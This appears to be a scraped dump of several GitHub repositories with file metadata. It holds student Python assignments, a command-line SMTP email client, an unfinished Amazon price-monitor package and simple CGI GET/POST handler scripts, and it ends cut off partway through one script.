choice == '3':\n addBook(theInventory)\n elif choice == '4':\n changePrice(theInventory)\n elif choice == '5':\n changeQty(theInventory)\n elif choice == '6':\n totalQty(theInventory)\n elif choice == '7':\n calculateTotalAmount(theInventory)\n elif choice == '8':\n print('Thank you for using this program')\n break\n else :\n print('invalid choice') \n \n return\n\nmain()" }, { "alpha_fraction": 0.5663430690765381, "alphanum_fraction": 0.647249162197113, "avg_line_length": 21.925926208496094, "blob_id": "fcf75bc114273a3946d6f1631a9554abf6d23823", "content_id": "e7aab239d4fabab7748dabd9beec21c970e23a11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 778, "license_type": "no_license", "max_line_length": 78, "num_lines": 27, "path": "/assignment3/assignment3.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 10 14:46:34 2019\n\n@author: cw020\n\"\"\"\n\n# 과제 3\n\nfrom skimage import io\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nphoto_data = io.imread('sd-3layers.jpg') # 이미지 읽기\nphoto_data.shape # 이미지 크기 확인\nradius = 3725 / 2 # 반지름 변수\nx, y = np.mgrid[0:3725, 0:4797] # 좌표 계산을 위해 만듦\ncircle = ((radius - x)**2 + (4797/2 - y)**2)**0.5 > radius # 반지름 보다 거리가 멀면 원 밖\n\nphoto_data[circle] = 255 # 원 밖 전부 흰색으로 만들기\n\nplt.imshow(photo_data)\n\nblack_white = np.logical_and(circle, x >= 1862 ) # 원 밖이면서 x 절반 아래\nphoto_data[black_white] = 0 # 원 밖이면서 절반 아래를 검정색으로\n\nplt.imshow(photo_data) # 이미지 출력" }, { "alpha_fraction": 0.4342442452907562, "alphanum_fraction": 0.4449188709259033, "avg_line_length": 24.467391967773438, "blob_id": "4316fd180c34bfb8b32330f2ec4a9065093086a5", "content_id": "1a5a47296be755a8387ac6c40d6c6cd7a1b8097a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2990, "license_type": "no_license", "max_line_length": 123, "num_lines": 92, "path": 
"/assignment1/assignment1.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\n# 정수 입력받는 함수\ndef inputNum():\n \n # stop이나 정수를 받을 때까지 반복\n while True:\n num = input('Enter an unsigned integer: ')\n \n # stop을 입력받으면 stop을 리턴해줌\n if(num == 'stop'):\n print('\\nThank you for using this program')\n return 'stop'\n \n # 입력받은 것이 숫자인지 확인\n elif(num.isdigit() == True):\n \n # 숫자가 양의 정수이면 그 수를 리턴\n num = float(num)\n \n if (num % 1 == 0 and num > 0):\n return int(num)\n \n# 변환할 진수를 입력받는 함수\ndef choice():\n \n # 올바른 진수 명령어를 입력받을 때까지 반복\n while True:\n choice = input('b or B for binary, o or O for octal, h or H for hexadecimal: ')\n \n # 2진수\n if(choice == 'b' or choice == 'B'):\n return 2\n # 8진수\n elif(choice == 'o' or choice == 'O'):\n return 8\n # 16진수\n elif(choice == 'h' or choice == 'H'):\n return 16\n # 올바르지 않은 명령어 입력시\n else:\n print('Invalid choice!')\n \n# 진수 변환을 계산해주는 함수\ndef calculate(num, cmd): # num은 진수로 나누어줄 수, cmd는 변환할 진수\n \n numList = [] # 나눈 나머지들이 순서대로 들어가는 리스트\n insList = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'] # 진수 변환 코드를 줄이기 위해 꺼내쓰기용 리스트\n res = '' # 리스트를 문자열로 병합\n \n # num이 변환할 진수보다 작을 때까지 반복 \n while True: \n \n # num이 변활할 진수보다 작으면 리스트 마지막에 넣고 반복문 종료\n if num < cmd:\n numList.append(num)\n break\n \n # num을 cmd로 나눈 나머지를 리스트에 넣어주고, 그 몫을 num의 값으로 변경\n else:\n numList.append(num % cmd)\n num = num//cmd\n \n # 리스트를 하나의 문자열로 병합\n for i in numList:\n \n res += insList[i]\n \n # 문자열을 뒤집어서 최종 값 출력\n print(res[::-1] + '\\n:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\\n')\n \n return\n \n\ndef main():\n \n print('\\n\\nThis program will convert a base 10 number into another base\\n')\n \n # stop을 입력받을 때까지 반복\n while True:\n num = inputNum() # 정수나 'stop'을 입력받음\n if(num == 'stop'): # stop을 입력받으면 프로그램 종료\n return\n cmd = choice() # 변환할 진수를 입력받음\n 
calculate(num, cmd) # 진수 변환 계산하고, 결과 값 출력\n \nmain()" }, { "alpha_fraction": 0.3179347813129425, "alphanum_fraction": 0.37228259444236755, "avg_line_length": 12.666666984558105, "blob_id": "39012923982f1cca9660d1cea01faac7cef24257", "content_id": "21b383502ca02e27ea007a9d116ece4506b59147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 368, "license_type": "no_license", "max_line_length": 40, "num_lines": 27, "path": "/test4.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 21 19:19:18 2019\n\n@author: cw020\n\"\"\"\n\ndef main():\n \n n_list = []\n n = int(input())\n i = 0\n \n while i < n:\n \n tmp = input()\n \n n_list.append(tmp[0:len(tmp)-3])\n \n i += 1\n \n for n in sorted(n_list):\n \n print(n)\n \n\nmain()" }, { "alpha_fraction": 0.36612021923065186, "alphanum_fraction": 0.41530054807662964, "avg_line_length": 16.1875, "blob_id": "c2a74bceb2a64c0b41278c1b51d5deb99ebc3421", "content_id": "d9151171a0b896f5b38898ca8ab519f864e03f97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 549, "license_type": "no_license", "max_line_length": 42, "num_lines": 32, "path": "/test.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 21 11:15:00 2019\n\n@author: cw020\n\"\"\"\n\n\ndef main():\n \n n1, n2, n3 = map(int, input().split())\n i = 0\n n = n1 + n2 + n3\n n_dic = {}\n n_list = []\n while i < n:\n num = input()\n if num in n_dic:\n n_dic[num] += 1\n else:\n n_dic[num] = 1\n i += 1\n for i in n_dic.keys():\n if n_dic[i] > 1:\n n_list.append(i)\n n_list.sort()\n print()\n print(len(n_list))\n for i in n_list: \n print(int(i))\n \nmain()" }, { "alpha_fraction": 0.4490644633769989, "alphanum_fraction": 0.47054746747016907, "avg_line_length": 24.785715103149414, "blob_id": 
"3104831d8379b154372430e81e6ce093fa05e82e", "content_id": "1d8a5979ab1c4d5133e278e6d075855d12ac2724", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2095, "license_type": "no_license", "max_line_length": 78, "num_lines": 56, "path": "/algorithm/algorithm.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 14 16:37:08 2019\n\n@author: cw020\n\"\"\"\n\ndef match(P, S, n, m):\n \n cnt = 0 # 파이썬에 do while문이 없어서 cnt로 첫 실행은 무조건 되게 설정\n l = -1 # 현재 검사 중인 문자의 패턴 시작 위치 (S기준)\n r = 0 # 현재 검사 중인 문자의 l로부터의 위치\n matched = False\n \n # 패턴을 찾거나, 패턴의 시작 위치가 문자열의 길이 - 패턴의 길이와 같아지면 반복문 종료 (돌려봤자 어차피 길이가 안되기 때문) \n while ((l < n - m) and matched == False) or cnt == 0 :\n l = l + 1\n r = 0\n matched = True\n cnt = cnt + 1\n \n # 패턴이 맞지 않거나, 패턴을 찾으면 반복문 종료\n while ((r < m) and matched) or cnt == 1 :\n \n matched = P[r] == S[l + r] # 문자열의 매칭 여부 확인\n r = r + 1\n cnt = cnt + 1\n \n # 마지막에 매칭한 위치인 r과 패턴의 길이가 같고, 마지막 매칭이 True이면 패턴 존재\n if r == m and matched == True :\n print('\\nstring의 ' + str(l+1) + '번째부터 입력하신 pattern이 존재합니다.')\n return\n \n # 만약 아니면\n else :\n print('\\n문자열 안에 입력하신 문자열이 존재하지않습니다.')\n return\n \ndef main():\n \n S = input('문자열(S)을 입력하시오: ')\n P = input('문자열(S) 안에서 찾고싶은 패턴(P)을 입력하시오: ')\n \n # 패턴의 길이는 1보다 크거나 같아야하고, 문자열보다 작거나 같아야함\n if 1 <= len(P) <= len(S):\n match(P, S, len(S), len(P))\n \n # 패턴의 길이나 문자열의 길이를 입력 안했을 때\n elif len(P) == 0 or len(S) == 0:\n print('\\n값을 모두 입력해주세요.')\n \n # 패턴의 길이가 문자열의 길이보다 클 때\n elif len(P) > len(S):\n print('\\n문자열(S)의 길이보다 찾고싶은 패턴(P)의 길이가 더 큽니다.')\n \nmain()" }, { "alpha_fraction": 0.3479999899864197, "alphanum_fraction": 0.41999998688697815, "avg_line_length": 10.409090995788574, "blob_id": "a4f24d51cb26e8124f45f4e8769828b0f25e00c0", "content_id": "e371eff6360ff21bf794a8e95c7a8b32985dbb4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 
250, "license_type": "no_license", "max_line_length": 42, "num_lines": 22, "path": "/알마.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 22 13:36:59 2019\n\n@author: cw020\n\"\"\"\n\ndef main():\n \n a = 2\n b = 1\n n = int(input())\n \n h = list(map(int, input().split(' ')))\n \n print(h)\n return\n \n \n \n \nmain()" } ]
8
luftj/Manno
https://github.com/luftj/Manno
239d493827be0ee9b197c63c64ec8c117ab9414b
98921af12f204801bdb48ccf45ec518100820045
09605913dca3c9982adf03adc50d3c14984c6e78
refs/heads/master
2022-12-08T22:54:01.404480
2020-09-10T19:55:05
2020-09-10T19:55:05
294,499,245
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6371681690216064, "alphanum_fraction": 0.643386721611023, "avg_line_length": 33.56198501586914, "blob_id": "99628f80f459bc826777087097cd73ec1b449ea9", "content_id": "7872c04e8daf1689ee393e29a9473218f238ee2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4181, "license_type": "no_license", "max_line_length": 139, "num_lines": 121, "path": "/main.py", "repo_name": "luftj/Manno", "src_encoding": "UTF-8", "text": "import argparse\nimport tkinter\nimport json\nfrom PIL import Image, ImageTk, ImageDraw\n\n\nstep = -1\ntruth_text_list = []\n\nimg_buffer_percent = 50\noutpath = \"annotated_result.json\"\nkey_ocr_text = \"NameBeforeDictionary\"\nkey_annotation_result = \"truth\"\n\ndef finish_cb(e):\n finish()\n\ndef finish():\n main_win.destroy()\n\n # save annotated json to disk\n if len(truth_text_list) != len(json_data[\"features\"]):\n print(\"Warning! text list wrong size!\", len(truth_text_list), len(json_data[\"features\"]))\n # raise Exception(\"text list wrong size!\",len(truth_text_list),len(json_data[\"features\"]))\n\n for idx, entry in enumerate(truth_text_list):\n json_data[\"features\"][idx][\"properties\"][key_annotation_result] = entry\n\n print(\"Saving to disk at %s ...\" % outpath)\n with open(outpath,\"w\",encoding=\"utf-8\") as file:\n json.dump(json_data,file)\n\ndef label_step_cb(e):\n label_step()\n\ndef label_step():\n global step\n step += 1\n\n if step >= len(json_data[\"features\"]):\n print(\"no more features, exiting\")\n finish()\n\n if step > 0:\n # store user entered ground truth value\n truth_text = entry_truth.get()\n truth_text_list.append(truth_text)\n\n # load text detection bbox from json\n coords = json_data[\"features\"][step][\"geometry\"][\"coordinates\"][0]\n x_coords = [p[0] for p in coords]\n y_coords = [-p[1] for p in coords]\n w_buf = (max(x_coords) - min(x_coords)) / 100 * img_buffer_percent\n h_buf = (max(y_coords) - min(y_coords)) / 100 * 
img_buffer_percent\n\n # define cutout window from detection bbox\n l,t,r,b = min(x_coords) - w_buf, min(y_coords) - h_buf, max(x_coords) + w_buf, max(y_coords) + h_buf\n detail_img = map_img.crop((l,t,r,b))\n\n # draw bbox rect\n draw = ImageDraw.Draw(detail_img)\n draw.rectangle(((w_buf,h_buf), (max(x_coords) - min(x_coords) + w_buf, max(y_coords) - min(y_coords) + h_buf)), outline=\"red\", width=2)\n\n # update image label\n photo = ImageTk.PhotoImage(detail_img)\n label_img[\"image\"] = photo\n label_img.configure(image=photo)\n label_img.image = photo\n\n # update detection label\n ocr_text = json_data[\"features\"][step][\"properties\"][key_ocr_text]\n label_detection[\"text\"] = \"Detection: \" + ocr_text # show OCR result\n entry_truth.delete(0, tkinter.END) # clear input field\n if key_annotation_result in json_data[\"features\"][step][\"properties\"]:\n entry_truth.insert(0, json_data[\"features\"][step][\"properties\"][key_annotation_result]) # insert existing annotation\n entry_truth.focus_set()\n\n label_progress[\"text\"] = \"%d/%d\" % (step, len(json_data[\"features\"]))\n\n print(step,ocr_text,(l,t,r,b))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"json\",help=\"filepath to json of text detection\")\n parser.add_argument(\"image\",help=\"filepath to corresponding map image\")\n parser.add_argument(\"--inplace\",help=\"set to change truth annotations inplace in input json\",action=\"store_true\")\n args = parser.parse_args()\n\n if args.inplace:\n outpath = args.json\n\n # load json detections\n with open(args.json,encoding=\"utf-8\") as file:\n json_data = json.load(file)\n if len(json_data[\"features\"]) == 0:\n print(\"no features! 
exiting...\")\n exit()\n\n # load map image\n map_img = Image.open(args.image) \n\n main_win = tkinter.Tk()\n main_win.title(\"Manno -- Annotating: %s\" % args.image)\n main_win.iconphoto(False, tkinter.PhotoImage(file='images/icon.png'))\n \n label_img = tkinter.Label(main_win)\n label_img.pack()\n label_detection = tkinter.Label(main_win, text=\"Detection\")\n label_detection.pack()\n entry_truth = tkinter.Entry(main_win)\n entry_truth.pack()\n b1 = tkinter.Button(main_win, text=\"Next [RETURN]\", command=label_step)\n b1.pack()\n b2 = tkinter.Button(main_win, text=\"Save & Quit [ESCAPE]\", command=finish)\n b2.pack()\n label_progress = tkinter.Label(main_win,text=\"0/0\")\n label_progress.pack()\n main_win.bind(\"<Return>\", label_step_cb)\n main_win.bind(\"<Escape>\", finish_cb)\n label_step() # start with first image immediately\n main_win.mainloop()" }, { "alpha_fraction": 0.7376543283462524, "alphanum_fraction": 0.7422839403152466, "avg_line_length": 31.399999618530273, "blob_id": "795004cfc337485e6f37732f2ee9e97eaa8b4260", "content_id": "d3704a31944fd284ddd605eebcbe8701f9c7c9e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 648, "license_type": "no_license", "max_line_length": 201, "num_lines": 20, "path": "/README.md", "repo_name": "luftj/Manno", "src_encoding": "UTF-8", "text": "# Manno, the map annotator\n\nthis tool is for quickly annotating ground-truth labels for OCR on maps. 
\n\n---\n\n![preview image of ui](images/preview.JPG)\n\n## Installation\n\nRequires\n* Python3\n\n```$ python3 -m pip install -r requirements.txt ```\n\n## Usage\n\nSet the desired buffer, output path and json keys in main.py\nThen run `$ python3 main.py [-h] [--inplace] json image ` with the path to your geojson file with text detections bounding boxes (see sample in `test_data`) and the path to the corresponding map image.\nSetting `--inplace` leads to no separate output file being generated, instead, the annotations will be added to the input json file.\n" } ]
2
lbraglia/pymzn
https://github.com/lbraglia/pymzn
18d3520c0876b7fa438d3fe9bcc50b0357120f86
9a9254e962631813c57df2620866291b0fef7e45
47ef31f47afbcdf3800d12c8d673a52e4af2866a
refs/heads/master
2015-09-25T12:38:41.919770
2015-09-16T07:46:43
2015-09-16T07:46:43
40,364,474
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5483871102333069, "alphanum_fraction": 0.5582047700881958, "avg_line_length": 32.9523811340332, "blob_id": "dbac36a457e3a282112a7726f172858ef3f86ee9", "content_id": "552d6a450189428c2ecb213ce3365e3afa514c1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 713, "license_type": "no_license", "max_line_length": 87, "num_lines": 21, "path": "/setup.py", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "from distutils.core import setup\nsetup(name = 'pymzn',\n packages = ['pymzn'],\n version = '0.1',\n author = 'Luca Braglia',\n author_email = '[email protected]',\n url = 'https://github.com/lbraglia/pymzn',\n license = 'GPLv3+',\n description = 'Monitor a list of products available in Amazon in\\\n search of good offers (world-wide)',\n entry_points={'console_scripts': [\n 'pymzn = pymzn.scripts:pymzn'\n ]},\n classifiers = [\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Development Status :: 3 - Alpha',\n \n ]\n)\n" }, { "alpha_fraction": 0.7495429515838623, "alphanum_fraction": 0.7495429515838623, "avg_line_length": 33.1875, "blob_id": "1ccd46db72d7eec0621ef670389791bed4073bae", "content_id": "094b15e24679ed51e71dd7df36c29352f8e06b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 547, "license_type": "no_license", "max_line_length": 76, "num_lines": 16, "path": "/README.md", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "# pymzn\n\n`pymzn` should be a Python package (providing a script) to monitor a list\nof products (the local `~/.pymzn_list` file) on a set of configurable Amazon\nsites (eg USA, UK, IT), in order to retrieve prices/conditions for new/used\ngoods, order by price and show what of interests you can buy for a few\nbucks.\n\nSome features:\n\n- should be as simple as 
possible\n- no auth/login required: anonymous requests and web scraping\n- probably to be used with a scheduler (cron/anacron?)\n- send alert (mail? else?)\n\nOr at least this is the big picture.\n" }, { "alpha_fraction": 0.6758620738983154, "alphanum_fraction": 0.6758620738983154, "avg_line_length": 23.16666603088379, "blob_id": "33da47f6028f6bec5a439fe93f9d28e1bbd16bf7", "content_id": "f8a94da2f0a45f23c3b6076eeef3fa78657a8c44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 37, "num_lines": 6, "path": "/pymzn/defaults.py", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "from os.path import expanduser\n\nrc_file = expanduser('~/.pymznrc.py')\npl_file = expanduser('~/.pymznpl')\nsites = ['usa', 'uk']\nbenchmark = sites\n" }, { "alpha_fraction": 0.6116504669189453, "alphanum_fraction": 0.6213592290878296, "avg_line_length": 29.899999618530273, "blob_id": "9ced5355e9d5f075e8c32fcb903d1be4d1093c6e", "content_id": "c19d32f2006cc8172fb9cf8c5d7ad88719280808", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 309, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/pymzn/helpers.py", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "import random\nimport time\n\ndef randsleep(min = 1, max = 1, quiet = True):\n 'Function to sleep the process for random.randint seconds.'\n secs = random.randint(min, max)\n if not quiet:\n print(\"Going to sleep for\", secs, \\\n secs > 1 and \"seconds.\" or \"second.\")\n time.sleep(secs)\n" }, { "alpha_fraction": 0.5670050978660583, "alphanum_fraction": 0.5700507760047913, "avg_line_length": 29.78125, "blob_id": "1a839897c5b6443bee347d927d599fcba3d10cba", "content_id": "7582d888b7994646fdf48c445e3f7bf268bc82b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 1970, "license_type": "no_license", "max_line_length": 77, "num_lines": 64, "path": "/pymzn/scripts.py", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "'''Command line scripts for the package'''\n\nimport argparse\nfrom . import defaults as df\n\ndef config(desc, cli, rc, prg_defaults):\n '''Chose between alternate config parameters: command line ones overwrite\n rc specified, rc specified overwrite program defaults.'''\n\n if cli is not None:\n rval = cli\n elif rc is not None:\n rval = rc\n elif prg_defaults is not None:\n rval = prg_defaults\n else:\n msg = 'No available values for %s' % (desc)\n raise Exception(msg)\n \n return rval\n\ndef add_missing_None(rc):\n ''' Add missing none to RC data structure in order to go on safely'''\n param_list = ['pl_file', 'sites', 'benchmark']\n for param in param_list:\n if param not in rc:\n rc[param] = None\n return rc\n \ndef pymzn():\n # Argument parsing\n parser = argparse.ArgumentParser()\n opts = (\n # ----------------------------\n # (param, help, default, type)\n # ----------------------------\n ('--rc', 'config files', df.rc_file, str),\n ('--pl', 'products list files to use', df.pl_file, str),\n ('--sites', 'Amazon sites (comma separated)', df.sites, str),\n ('--benchmark', 'Benchmark site', df.benchmark, str)\n )\n for i in opts:\n help_string = '{0} (default: {1})'.format(i[1], i[2])\n parser.add_argument(i[0], help = help_string, type = i[3])\n args = parser.parse_args()\n\n # RC config parsing\n rc_file = args.rc if args.rc is not None else df.rc_file\n loc = glob = {}\n exec(open(rc_file).read(), glob, loc)\n rc = add_missing_None(loc)\n \n # Config setup: command line > rc > program defaults\n pl_file = config('pl_file', args.pl, rc['pl_file'], df.pl_file)\n sites = config('sites', None, rc['sites'], df.sites)\n benchmark = config('benchmark', None, rc['benchmark'], df.benchmark)\n\n # Read product_list\n\n # Scrape data\n\n # Convert currencies\n\n # Send reports\n" }, { 
"alpha_fraction": 0.6447368264198303, "alphanum_fraction": 0.6578947305679321, "avg_line_length": 36.5, "blob_id": "811cba82a69ddc421a3b6611404555fb3984430e", "content_id": "e120cb92d07b051aad5485bedcbba70ff55ffb62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 76, "license_type": "no_license", "max_line_length": 65, "num_lines": 2, "path": "/Makefile", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "install:\n\tcd .. && pip3 install --upgrade --force-reinstall --user ./pymzn\n\n" } ]
6
utkarshdubey/Python---Email-Client-CLI
https://github.com/utkarshdubey/Python---Email-Client-CLI
8a4ffeab781fedfef24cb215e9d9653a37d49ed4
0198e36f43ae7fe07b4d0866e3bfefeca177ec0b
83a5cb516895cc8619895f7fef90da4b65bad771
refs/heads/master
2020-03-26T16:48:07.039020
2018-08-18T05:35:16
2018-08-18T05:35:16
145,123,598
0
0
null
2018-08-17T13:26:29
2018-08-18T05:36:26
2020-02-15T16:51:10
Python
[ { "alpha_fraction": 0.7312802076339722, "alphanum_fraction": 0.7451691031455994, "avg_line_length": 27.55172348022461, "blob_id": "bb1cbf3e4cedf18184fbdae1aafd0eae010445da", "content_id": "6d98a2460ec591d9aefed20d3a51a8334dcd7e04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1656, "license_type": "no_license", "max_line_length": 155, "num_lines": 58, "path": "/README.md", "repo_name": "utkarshdubey/Python---Email-Client-CLI", "src_encoding": "UTF-8", "text": "# Email Client CLI\n\n### Overview\nEmail Client CLI, is a CLI client for sending emails to desired addresses without opening the browser everytime. It requires some packages.\n### Demo\n\nStep 1:\nWe open the CLI envrionment. \n\n\n![alt text](screenshots/rsz_scr_1.png \"Step 1\")\n\nStep 2:\nWe configure the email information. \n\n\n![alt text](screenshots/rsz_scr_2.png \"Step 1\")\n\nStep 3:\nWe enter the details and create a sample email message with html and send an email to our desired address. \n\n\n![alt text](screenshots/rsz_scr_3.png \"Step 1\")\n\nStep 4:\nWe see that the email arrives in the mailbox. \n\n\n![alt text](screenshots/rsz_scr_4.png \"Step 1\")\n\nStep 5:\nWe can now see the whole formatted email. \n\n\n![alt text](screenshots/rsz_scr_5.png \"Step 1\")\n\n### Requirements\n- Python Version 3.4 or above\n- Pip Version 9.0 or above\n- Package Termcolor. 
``pip3 install termcolor --user``\n- A cup of coffee near you.\n\n### Installation\nYou should have MIME and SMTP libraries pre-installed which are default in Python version 3.4 and above.\nYou should also have Termcolor package installed which you can do with the following command.\n``pip3 install termcolor --user``\n\n- After that just download this package and extract the zip file.\n- After extracting the package, run the main.py file with the following command.\n``python main.py ``\n- Sip your coffee now.\n\n### Contributions\nHey if you are interested in contributing in this open-source project. Please open a pull request or an issue to improve the current state of this project.\n\nIf you have better versions of this project, then contact me and we can get the ball rolling.\n\n[Visit my website](http://utkarsh.co)\n" }, { "alpha_fraction": 0.5518824458122253, "alphanum_fraction": 0.5580042600631714, "avg_line_length": 28.432432174682617, "blob_id": "fd1a578974f25d7c23885b36e1963ef809670e10", "content_id": "4b9c4f10e341bfe2a1fa407b64e6fdc5a4b8820a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3267, "license_type": "no_license", "max_line_length": 106, "num_lines": 111, "path": "/main.py", "repo_name": "utkarshdubey/Python---Email-Client-CLI", "src_encoding": "UTF-8", "text": "import sys, csv, getpass, signal\nfrom random import randint\nfrom smtplib import SMTP, SMTPAuthenticationError, SMTPException\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom os import system, name\nfrom termcolor import colored, cprint\n\n# GLOBAL VARIABLES\nfile_name = 'data_mail.csv'\n\n# functions\n\ndef clear():\n if name == 'nt':\n _ = system('cls')\n else:\n _ = system('clear')\n\n# Other stuff\n\nprint(\"\"\"\n Welcome to CLI Email Client.\n Here is a list of common hosts and their information.\n\"\"\")\nprint(colored(\"\"\"\n Gmail:\n Host => \"smtp.gmail.com\"\n Port => 
587\"\"\", \"yellow\"))\nprint(colored(\"\"\"\nNOTE: Please don't forget to allow less secure apps from the Google Panel,\nor else this CLI Client will not work.\n\"\"\", \"red\"))\n\nwhile True:\n print(\"\"\"\n 1) Enter 1 to configure your email client.\n 2) Enter 2 to send an email.\n\n 3) Enter 0 to exit.\n \"\"\")\n inp = input(\"Please enter an option: \")\n if int(inp) == 1:\n host_name = (input(\"Please enter the host url: \"))\n port_name = input(\"Please enter the port: \")\n user_name = input(\"Please enter your email address: \")\n user_pass = getpass.getpass(\"Please enter your password: \")\n user_data = [[\"host\", \"port\", \"email\", \"password\"], [host_name, port_name, user_name, user_pass]]\n data_file_name = open(file_name, 'w')\n with data_file_name:\n writer = csv.writer(data_file_name)\n writer.writerows(user_data)\n clear()\n\n if int(inp) == 2:\n\n # Reading the CSV file\n with open(file_name) as csv_file:\n csv_reader = csv.reader(csv_file)\n count = 0\n for row in csv_reader:\n if count == 0:\n count += 1\n else:\n host_name = row[0]\n port_name = row[1]\n user_name = row[2]\n user_pass = row[3]\n count += 1\n\n # More information\n\n host = host_name\n port = port_name\n username = user_name\n password = user_pass\n to_mail = input(\"Please enter the receivers email address: \")\n\n # EMAIL INFORMATION\n msg = MIMEMultipart(\"alternative\")\n subject = input(\"Please enter the subject of the email: \")\n from_name = input(\"Please enter the from name: \")\n to_name = input(\"Please enter the to name: \")\n msg['Subject'] = subject\n msg['From'] = from_name\n msg['To'] = to_name\n\n msg_info = input(\"Please enter the message(HTML Supported): \\n\")\n part = MIMEText(msg_info, 'html')\n\n\n msg.attach(part)\n\n # EMAIL SENDING PART\n try:\n email_conn = SMTP(host, port)\n email_conn.ehlo()\n email_conn.starttls()\n try:\n email_conn.login(username, password)\n except SMTPAuthenticationError:\n print(colored(\"The credentials are 
wrong.\", \"blue\"))\n email_conn.sendmail(from_name, to_mail, msg.as_string())\n email_conn.quit()\n except SMTPException:\n print(\"Sorry an error occured.\")\n\n clear()\n\n if int(inp) == 0:\n sys.exit()\n" } ]
2
heizi1307/request_method
https://github.com/heizi1307/request_method
12c6f204d6b9dcf4fef81255611457526103ee45
74bcabbf07870070e3c4c00925329d734e790c0f
1ae9af53e578238acdf05526ccc5b471d7d41fc8
refs/heads/main
2023-08-28T13:52:35.694647
2021-10-03T05:32:43
2021-10-03T05:32:43
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5290948152542114, "alphanum_fraction": 0.5571120977401733, "avg_line_length": 25.514286041259766, "blob_id": "c270b85e9c86cd87c40a6df4a011b21dd986e3e4", "content_id": "15e5c7cb0d856d48dde26046cc6faeb7a177b6d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 66, "num_lines": 35, "path": "/request_method_get.py", "repo_name": "heizi1307/request_method", "src_encoding": "UTF-8", "text": "#! /usr/bin/python3\nimport cgi\nimport os\nform = cgi.FieldStorage()\ntext1 = \"\"\ntext2 = \"\"\nif os.environ[\"REQUEST_METHOD\"] == \"GET\":\n if \"asdf\" in form:\n asdf = form[\"asdf\"].value\n for i in range(20):\n text1+=asdf\n else:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The variables 'asdf' and 'jkl' are both required\"\n if \"jkl\" in form:\n jkl = form[\"jkl\"].value\n for i in range(20):\n text2+=jkl\n else:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The variables 'asdf' and 'jkl' are both required\"\nelse:\n text1 = \"Status: 405 Method Not Allowed\"\n text2 = \"Allow: GET\"\nprint (\"Content-type:text/html\\r\\n\\r\\n\")\nprint ('<html>')\nprint ('<head>')\nprint ('<title>request method get</title>')\nprint ('</head>')\nprint ('<body>')\nprint ('<p>%s</p>' % text1)\nprint ('<br>')\nprint ('<p>%s</p>' % text2)\nprint ('</body>')\nprint ('</html>')\n" }, { "alpha_fraction": 0.4501262605190277, "alphanum_fraction": 0.4722222089767456, "avg_line_length": 25.847457885742188, "blob_id": "7083dc9652b71fd63f51303b24de0833d9a7a400", "content_id": "f5fa426dbd0d0aeabc1d1a3fab48faf346155bf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1584, "license_type": "no_license", "max_line_length": 67, "num_lines": 59, "path": "/request_method_post.py", "repo_name": "heizi1307/request_method", "src_encoding": "UTF-8", "text": "#! 
